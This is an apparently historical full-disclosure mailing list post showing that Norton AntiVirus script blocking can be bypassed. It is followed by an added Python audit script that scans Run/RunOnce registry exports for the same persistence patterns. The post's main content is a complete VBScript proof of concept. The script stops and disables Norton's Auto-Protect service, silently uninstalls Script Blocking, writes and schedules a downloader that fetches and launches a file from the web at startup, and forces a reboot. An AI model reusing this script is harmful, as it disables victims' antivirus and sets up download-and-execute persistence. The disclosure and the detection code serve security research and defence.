Norton Anti-Virus Script Blocking Can Be Bypassed

Hi All,
I have major issues with the quality of Norton AntiVirus. For some
history, see:
http://seclists.org/lists/fulldisclosure/2004/Oct/0540.html
- Norton AntiVirus 2004 Script Blocking Failure (Rant and PoC enclosed)
http://seclists.org/lists/fulldisclosure/2004/Oct/0775.html
- Norton AntiVirus 2004/2005 Script Blocking Redux
Symantec's Response to this issue (from a week ago):
"ScriptBlocking is intended to provide proactive detection against
script-based worms and this component of Norton AntiVirus has been
effective at doing this since its introduction in 2001"
Huh?
Below is a 'typical' script-based virus that Norton AntiVirus will allow
a user to run, without *any* intervention on NAV’s part whatsoever.
It’s likely that code similar to this is already appended to
script-based threats/worms to assist their penetration in the wild.
In a nutshell, here’s what it does:
On Reboot it sets…
1) The NAV Auto-Protect Service to DISABLED
2) A registry key to Uninstall Script Blocking
3) Creates, launches a VBScript file to d/l the EICAR AV 'test' virus
4) Launches the EICAR.COM test pattern a few seconds later
...then reboots your computer.
The following code was tested under WinXP and a fully LiveUpdated NAV
2005 using a broadband Internet connection. Should be fine for Win2000
and NAV 2004 as well.
--------//// BEGIN DISABLE_NAV.VBS ////---------
' ----- DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI -----
sServer = "."
Set oWMI = GetObject("winmgmts://.")
sServiceName = "Norton AntiVirus Auto-Protect Service"
sWQL = "Select state from Win32_Service " _
    & "Where displayname='" & sServiceName & "'"
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
    oService.StopService
    oService.ChangeStartMode("Disabled")
Next
' -------- UNINSTALL SCRIPT BLOCKING WITH WMI ;) ----------
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Uninstall Norton Script Blocking"
arrStringValues = ("MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues
' -------- CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ---------
Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Downloader"
arrStringValues = ("cmd /c ECHO Set X=CreateObject(" + chr(34) + "Microsoft.XMLHTTP" + chr(34) + "):X.open " _
    + chr(34) + "GET" + chr(34) + ",(" + chr(34) + "http://www.eicar.org/download/eicar.com" + chr(34) + "),False:X.send:set " _
    + "Y=createobject(" + chr(34) + "adodb.stream" + chr(34) + "):Y.type=1:Y.open:Y.write " _
    + "X.responseBody:Y.savetofile(" + chr(34) + "eicar.com" + chr(34) + "),2:Y.close > estart.VBS")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues
' -------- CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ----------
Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Launcer"
arrStringValues = ("cmd /c ECHO wscript.sleep(10000):Set Z=CreateObject(" + chr(34) + "WSCript.Shell" + chr(34) + "):Z.run(" _
    + chr(34) + "cmd /k eicar.com" + chr(34) + ") > elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues
' -------- LAUNCH EICAR DOWNLOADER ----------
Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Code DownLoader"
arrStringValues = ("estart.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues
' -------- RUN THE 'VIRUS' ----------
Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Malicious Code Launcher"
arrStringValues = ("elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues
' ---- USE WMI TO FORCE A REBOOT -- NEXT LOGIN, PWN3D ----
Set wmi = GetObject("winmgmts:{(Shutdown)}")
set objset = wmi.instancesof("win32_operatingsystem")
for each obj in objset
    set os = obj : exit for
next
os.win32shutdown 2 + 4
--------//// END DISABLE_NAV.VBS ////---------
Best Regards,
Daniel Milisic
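A defender-side check added here (not part of Daniel's post): a Python audit that parses a .reg export of the Run/RunOnce keys and flags entries showing the persistence pattern the script above leaves behind, namely a silent MSIEXEC uninstall queued at startup, a startup command that ECHOes a script to disk, and a bare .vbs launched at startup. The sample export is constructed, and the text form of a `reg export` output is assumed.

```python
import re

# Constructed sample: a .reg export of the Run/RunOnce keys as the PoC above would leave them,
# plus one benign entry that must not be flagged.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Uninstall Norton Script Blocking"="MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q"
"Create Code Downloader"="cmd /c ECHO Set X=CreateObject(\"Microsoft.XMLHTTP\") > estart.VBS"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Execute Code DownLoader"="estart.vbs"
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
'''

AUTORUN_KEYS = ("\\CurrentVersion\\Run", "\\CurrentVersion\\RunOnce")
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

# Each rule: (reason, predicate over the lower-cased command string).
RULES = [
    ("silent MSI uninstall queued at startup",
     lambda c: "msiexec" in c and " /x " in c),
    ("startup command writes a script file to disk",
     lambda c: "echo" in c and re.search(r">\s*\S+\.(vbs|vbe|js|wsf)\b", c)),
    ("script file launched at startup",
     lambda c: re.search(r"\.(vbs|vbe|js|wsf)\s*$", c) or "wscript" in c or "cscript" in c),
]

def _unescape(s):
    # .reg files escape backslash and double quote inside string data
    return s.replace('\\"', '"').replace("\\\\", "\\")

def audit_autoruns(reg_text):
    """Return Run/RunOnce values that match the persistence pattern of the PoC above."""
    findings, key = [], None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if not m or key is None or not key.endswith(AUTORUN_KEYS):
            continue
        name, cmd = _unescape(m.group(1)), _unescape(m.group(2))
        for reason, pred in RULES:
            if pred(cmd.lower()):
                findings.append({"key": key, "name": name, "command": cmd, "reason": reason})
                break
    return findings
```

Run it against `reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" out.reg` (and the Run key) on a suspect box; a clean machine should yield no findings from these three rules.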